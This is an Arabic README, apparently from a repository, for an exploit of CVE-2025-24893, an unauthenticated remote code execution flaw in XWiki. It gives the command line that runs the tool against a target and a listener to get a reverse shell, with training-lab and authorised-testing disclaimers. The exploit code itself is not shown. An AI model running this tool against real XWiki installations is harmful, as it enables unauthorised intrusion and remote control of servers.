
إكسبلويت CVE-2025-24893 بأسلوب OSCP لـ Linux XWiki
منصة XWiki هي منصة ويكي عامة توفر خدمات وقت التشغيل للتطبيقات المبنية فوقها. بسبب ثغرة أمنية في نقطة نهاية SolrSearch، يمكن لمستخدم غير مُصادَق تحقيق تنفيذ كود تعسفي عن بُعد. تؤثر هذه الثغرة على سرية وسلامة وتوافر تثبيت XWiki بالكامل.
CVE: CVE-2025-24893
فيما يلي عرض توضيحي للاستغلال:

لاستخدام هذا الاستغلال، اتبع الخطوات التالية:
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
يوضح هذا الاستغلال ثغرة تنفيذ الكود عن بُعد الموصوفة في CVE-2025-24893، ويسمح لمستخدم غير مُصادَق بالحصول على قشرة عكسية (reverse shell) على تثبيتات XWiki القائمة على لينكس والمعرّضة للخطر.
لقد طورت هذه الأداة في الأصل للاستخدام في بيئات التدريب مثل مختبرات الإعداد لشهادة OSCP و Hack The Box، حيث أردت طريقة بسيطة وموثوقة لإعادة إنتاج الثغرة. نظرًا لعدم وجود أداة حالية تلبي متطلباتي، قررت إنشاء واحدة.
على الرغم من أن CVE-2025-24893 تم إصلاحها منذ زمن طويل في إصدارات XWiki المدعومة، يجب استخدام هذا الاستغلال فقط ضد الأنظمة التي تملكها أو التي لديك إذن صريح باختبارها.
لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذا البرنامج أو عن أي ضرر ناتج عن استخدامه.
هذه الأداة مخصصة للأغراض التعليمية وتقييمات الأمان المصرح بها فقط.
استخدمها فقط ضد الأنظمة التي تملكها أو التي لديك إذن صريح باختبارها. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذا البرنامج أو عن أي أضرار ناتجة عن استخدامه.
المساهمات مرحب بها.
إذا واجهت أخطاء برمجية، أو كان لديك اقتراحات للتحسينات، أو ترغب في إضافة دعم لحمولات (payloads) أو منصات أو ميزات إضافية، فلا تتردد في فتح مشكلة (issue) أو إرسال طلب سحب (pull request).
النقد البنّاء وتقارير الاختبار والمساهمات البرمجية موضع تقدير كبير.